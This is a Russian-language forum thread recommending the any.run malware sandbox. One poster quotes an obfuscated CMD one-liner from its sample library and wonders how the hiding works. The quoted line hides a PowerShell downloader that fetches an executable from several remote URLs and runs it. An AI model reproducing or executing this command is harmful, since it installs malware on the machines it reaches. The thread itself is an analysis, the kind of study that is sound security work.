Полезный сайт (сэмплы вирусов и их анализ)

[Tayrus]

Приветствую обитателей форума, нашел вот такой вот сайт:

https://app.any.run

Вот так сайт выглядит:

Что этот сайт из себя представляет?
Здесь вы можете найти сэмплы вирусов посмотреть что они делают, все очень детально.
Так же вы можете зарегаться на этом сайте и создать свое задание(ваш файл проверят и вы получить детальную информацию о нем).

 

[Sphinx]

Достаточно интересный сервис.
Уделив немного времени библиотеке вредоносных программ, я наткнулся на следующее:

/c               CM%tMp:~-15,1% /V:oN /R   "  SET   '?=-__///\_/\-\_\- \/-/_-\_-/\__\- -/\_\-//_\\/_-_ \\_\-/-__\/-_-/ \_-\-_/__-/-\/\ -__\\--\/\/__/- \-__/_\/\\/--/_ _--\_\_//-/\-\/ -/-\\/_/\__-\-_ ///_\-\-__\/\-- -/-_/\_/\_-/_\- \__-/_-\\\--/_/ \_/_-/\_/---/_\ _\/-\_\-/-/_/\_ __/-_\/\-/\/--\ _-\\__\-/-///_- /\/-__/---/\\_\ _/--/\__/-_/\\-}/_\_--//_\-/\-\}_-\//--\-/\/_\_{_\//\--_//\-\-_h_//-\-\/\-___\-c\\-////\_-___\-t\//\-_\---/\__/a/\--_-_/\_-/\_/c-_-__-\///\-_\/}-_-\\\___//\/-/;-/\\\\_//_-_/-_k/_-\-__--\//\/_a\\/___--\/-/\-_e_\\--_\-//-_\//r\/-_//\__-/-_\\b/\_--_\-/_\-/_/;\//-_/-/\\--\__S\-_\_/__-/\/\/-D-___\-/\/_-\\-/f/\-_/\\-_/_\_--$/__-/_\\/-/-_\- \--_\\///_-\-_/s-/\--___//\-/\\s\-_\-\//-\-___/e\_\-_/_//---_/\c\-/\/-__/\_-/_\o/\-/_\_\/\_-_--r\\\/-/\_--/__/-P/_-/\\\--_//_-\-\-\\-/_-/-/___/t//\\\/_\-/-__-_r_-////_-\_\\\-_a\/\_-___/-\//-\t\\/\-/-_\___/--S-/_-\//_-/\_-\\;\-_//\/-/\-__\-)\_-_--_\/\/\_//S\--_/-/\/\/_-__D/-\\__-\-_/-_\/f/-/\-/_\_\/-\__$\\/\__-\_---//_ -/--/\_/\__\-_\,_\_-//-_/--\_\\B---//\_/_-\\__\k/_\/_\_/-_\--/-c_/\\-\//-\_-/_-$-\/-_/\/_-\-/__(_\--/_-\\\/_-/_e/\-/--_/\/_-\\_l--\/\\\___/_/--i\_//_/-/---\__\F\/\---_/\-_//\_d/-_-/_\\/\-_\-/a/\_\-\_\/_-_/--o\_//-\\_/_-_-\-l___-_/-//\/\\--n/--\\-_/-/\/_\_w//-\_-\\-_-\/_/o-\--//\_-_\//\_D-/-\__/_\-/-\_\.-\\/\__--//__-/u_\\/_//\--_/-\-i\_--_\\_//_/-/\G_-///\_\-_\-/-_$-_\\-/__-\\/_/-{\_//-\\_-__\--/y\-\/\/-__--//\_r/_-_-\_-/\_\\-/t/\_\-_--/\_//_\{\-_\_--/-\\_/_/)-/-//\-/-\\_\__i/\_-_--/\\//_-\j/\-\_\\//-__-_/w--/_/_\-\_/_\\/$_/-_\_//\-_-\-\ \---/\\/\_/_/__n\-__/__\-\-//-/i\-\__/-__-/\/\/ -/_\/_-_\\_\-/-B_-\-/\\-_-//_/_k_/_-\-//-\\\/-_c-/--\/___/\/-\\$__//_-_-/\\-\/\(--\--//\___\/\_h__\_//\-/--\_/-c-/-\_-_-/\\\__/a\_//--_\--__/\\e---_/_/_//\\\-\r//\-/-/__--\_\\o__-\\/-//_\-_/\f_/-_--_/\//\\-\;\-_-_/\/--_/_\/'__/\/-\_-\_/-/-e/_/\\-/--_-_\/\x_//-_/-\/\__\-\e_/_-/_/\\-\/--\.--_-/\\\/_\//__'_\\-\\__/_//-/-+-/-\\\-_-/_/\/_j/\\/_-/_\__-/-\a\-_/-/\\-__/-_/P-/-/\__-\_\\/-/$/--_\-\//_-\\_/+/\-/__/-_/\_\--'_\\\_/-/-__/-\-\_\__/---/-\\_//'-/\_\-_/--/_\\_+___/\--//\_\/-\p_\\\__///-/_\--m-\\\\--//__/__-e-_\_\_/-/\/-\_-t-/_\__/\-/-\\_-://_-/\\-_\/\_-_v_-\/\-\///_\-__n/\_\//_\--_--_/e/\//\-_-\-\-/__$_/\\-_/\_/_--/-=/\_\-/_\_-/_-\/S--\_///\--\\__/D_-/\/\/-/\_-__-f_\_/_-///-\\_\-$/__/-_/_\\-\/--;_/-/__-\_-/\-/\'__/\/_-/\-/_-\-8__--/\/\-/\_-/\4\-\-_\//__-//\-4\_\/\_-_//--\_/'-\_\-/_-\/_-/_\ -/__//\_/\\--_-=_--\__--\///_\/ -/\-_/__-\\-\//j/_-\__/_\\/--/-a/\-//\--___\-_\P__/--//\-\-_\\/$///_\\\-/\_-__-;\/\--_-__\_-\//)-\___-\\-\_/-//'//\\--_/\__-/-\@__-/__-/\-\\/-/'\/___/_-\/--\/\(\-\-\//___/_-/-t/_-_//\-_/_\\-\i\_\-_/_/--\_\-/l_/-\/_\--\\-__/p-\--/\/\\-_/_/_S/-/\/__\\/-\-__._-/\_-_/-_-/\\/'/\/-/_-_/\_\_-\7_-__-\//-_\-\/\v\\-\-/--_/_\/_/q\-/\--/\__\-/_/C_\\-/\//-_/_-\-4/\-/--\_/\-__/_//_-/\__\\_-\-//g-\/-\_//-\-\/__r_/_-/_/\\-/\\-_o_-__--//\/\/_-\.--\__\\/_/\_-/-e__-\/\_--\///\_t\//-\_/--/\_-__u/-\/\\_-_-_\_//a/-_/_/\-\-\\/-_b\--\///_\\--_/_/---\_\_-\\///_///_-/\//_-\_\\-_:-/_--_//\_\_\-\p-/\___\-/-/\\-/t//\-\-__--__/\\t__/-\-\\_\-_/-/h/\/_--\-_-_/\\_@/--__\/\/\-\__-S\--_/__/-\-\_//A\_--\__////-_\-P-_/_--\\/\/\_-/Z-\_\//-__\-/-_/b\--\___\/-\//-_///-\_/-\___-/-\x\-/__-/-\_\/\_/m-_\/_/-\-_/\/_-.\/-/_\-\//-_-_\l_//__\-/\\--_/-a-_\_-\/-_/\_\//p\-_-///_\-/\__-i_\/--\_-/\_\-//c--/_/-\/-___\\\i--\\__//\__/\/-n//-\-_-\_-/\_/_u__\/\-__--\///\m_-_-///-\\\_\_-a\\--\\_/_///-_-m_-//\-_-/_\\/_\r-//\-/-__\\\__/o_\\/-/_--\\/_/_f\\//--\/_-__-\/a-/-/-___\\\-_\/t_/\/\\_/-\_---/a_-_-_\--/\/_\/\l/-_-_\/_-\/-\/_p/_--_/\/-_-_/\\.\/-/__\\--/__/-o\-\-_\//-\-/_/_d__--///\\--_\\_i_/--_\/\_-_/-/\p_/-\_\-/_-/_-/\a/\-_/\-_/_\_/\-r\/_/_--\-\-/_\/o/\//\-_-\/__-\_e_/-/--_\\-\/_\/t--/\/__\\/\-/-_n/\--/\-_/__\-_\o\/\--_/_-/__\/-c-/_\_\_-/\-/_\-/-__/\_/--\\_-/\//-\//-/-\-\_\__:-\/-/_/\/_\__--p-/\/\/_\--\__-/t/-\-\-__//_\\/-t_/__/--_\\\-\/-h_\\__\---\//-/_@__\_-/\\\/--/_-D_/\/-\\_//_-_--Q\\_-\-_//_-/_-/s\/\__/\-/\---__O\_-//\/---___\/Q/-/\\/_\_\_-/_-//\--\//_\-___\-m_/_-/\/_\--_\-/o-/_\-__\\/\-/-/c__\-_//\/--\-/_.\/--__-/\_//_\\a_--//\/\\__--_/s__-/--\\\\-_/_/a/-\_\//--_-\_\/c\_/\\/-/\-/-__-n\/\-__--_\/_-/\e-//\_-___\\/-\/r--_/-/\\__\/\_/e/\/\_\-/\__-/--d_/-/\/--_/_-\\\n-\/_\_-/_/\-_/-e\\/_-\--/\/-___r/\\-__/\/_/--_\p_-\/\_-__\\-/-/a/\_\\\/_-_/--/-//_--\-\//-\\_/_/-_/\-/-\__-\_\/:-\-//\\\-_//_-_p-/--_-/\_\_\_/\t_-\/_\\--__-//\t--_\/_/_/_\/-\-h_\/_/_/_\--\/--@\-\_//-\--/__/\x\\--/__\_\/-_/-D\_-//_/_/-_-\-\f/-\-\//_-\_-_\_c_-_\\\_/-//\/-_b/_\/---_\\/-/__/-/_/\/\\--\_/__m/\-_\-\/_/-_-_\o/_\_-_-/-\_\\//c_\/_/\/\__--/--./_/\-\-__\_-/-/s_-\_-\_\/-/_//-r\\//_/\-/-___\-o-\_/-_-/_\_/\-\t-\/-_-_/_/\\_-\c\/_--/\_-__\-//a/-_--_\/\__\\/-g__\/--\--_/_\/\n\//_/--\/-__-\_u-\_/__-_-//-\\/o/--_-\//\/_\\_-y--/-/_\_-\_\/_/c__//\--\_--/\_\o\--__-/-\/\\_/_._\//-\/-_-\\-/_w//__-\-//\__\\-w-_\\\_/---/\_/_w/-_\--/_/\\__-\/-/\-\//\\-___-//--\_\//-\__//_-:/-/_-\_\_\/\--/p\-////\_\-__-_\t\_\-///_-_\_--\t_-/\//_/-__-\-\h\-__\_-\\-///_-@\_//-/\\/_-__--D_/\/\_--/__\--\G\_/--\-\_/__-\/n-_\/-\\-_//_-_\b_-\-/_--//\_\/\M_//-_\\\_--\/-_/\_--\/_\\/-//_-t/_/\__\-/_/--\\e/_/\-_-_\\-_-/\n-\\\-_-/\_/_/-/.\///\__-\-/-\__r\/\/_\-\/__---_e_--_/\\/\-/__/-t\_/__---\/\/-_/n/\_-\/-_/--_\_\e_-\-_/\_-/-\\/_c/-\//__/_\-_-\\r-/_-\_-\\/_\//-e\//_/\-_\-\_/-_t_/--/\_-_\\\-//n/__\_/\/-_\-/-\e_\__-\/\--//\_/.-_\_/_\\/\-_--/s__---_\_/\//-\/e//-_/\\\---/_\_r\_//-/\-_\/\_-_/_///_/_--\-\_\-/_-\_/--_\/\_/-\:\-\/__-//\_/_\-p\-_/-/_\-_\-//_t/\_-/__//\_--\\t-/_\_--\\-_\///h-_--//-_\/\_/_\'/\\--_/\/_/\--_=_-__//-\\/-/\\-i_/\_/\-/\-_-_\-j\-_-__\\-/_/\//w-_//_\\/-__/--\$_-\_\-__\\/--//;/_\\-/--_/-_/_\t--\\//_/_-\_\-_n-\_-/-/__\\_-/\e\_\_/-_-_//\--/i\-///\/_\_\-_-_l\\/_---/\-/\___C-\/\_//-\-_-__/b\/\_\--//__-\-_e--_//_-/\/_\\-_W_\--_\\\_///-_/./-/\\\_-/_\--_/t-//\\-\/_-_/\__e-_-/\\/\\_//_--N_\__\---\_/\/-/ -\/\-__-_\//\_-t_\\_/\-\//--/__c-_\_-\/_/-_/\-\e/__--_/\-_/\\-/j/__//--_/\\\-\_b-\\__-_/\_/-\-/o/_/-/-\\__/\-\--/--_\\\_--/_/_\w/-/\_/\\/_---_\e-/_/\\\_-/-_\/-n-\_--///-/__\\\=/-__-///_-\\\_\u\\_--\\/_/__//-i-__-\/-/\\-//_\G_\_\\-//-_-/_/\$/-_/\_\/-_\\/-- -/-\/\_\-__/_\-l_\--\/_/__\/\--l_--_\\\///_/-\-e_--\_//_\_\//--h_\_//-\-/-\_\-/s/\-\-/_\__-_/\-r-_-\/\_-\/\/_/-e\\/-_-_/_--/\/_w_/__\/--//\\\--o-\\/-/-_-/\_/__p&&      fOR  /l %2 IN  ( 6111 -16    15)do  seT @;-+=!@;-+!!'?:~  %2,   1!&& iF  %2   LSS 16  CalL %@;-+:*@;-+!=%    "

И, исходя из сего прекрасного кода, могу лишь заявить: обфускация на самом высшем уровне.
Код, приведённый выше, выполняется в среде CMD.
Однако, проблема в следующем: каким образом возможно провести такого рода скрытие кода? Вероятно, моё предположение неверно a priori, однако скорее всего это — shell-код. Но, тогда зачем он выполняется дважды? И, по какой причине код загрузки через PowerShell также не скрыт от наших глаз?
Дело остаётся токмо за скрупулёзным изучением.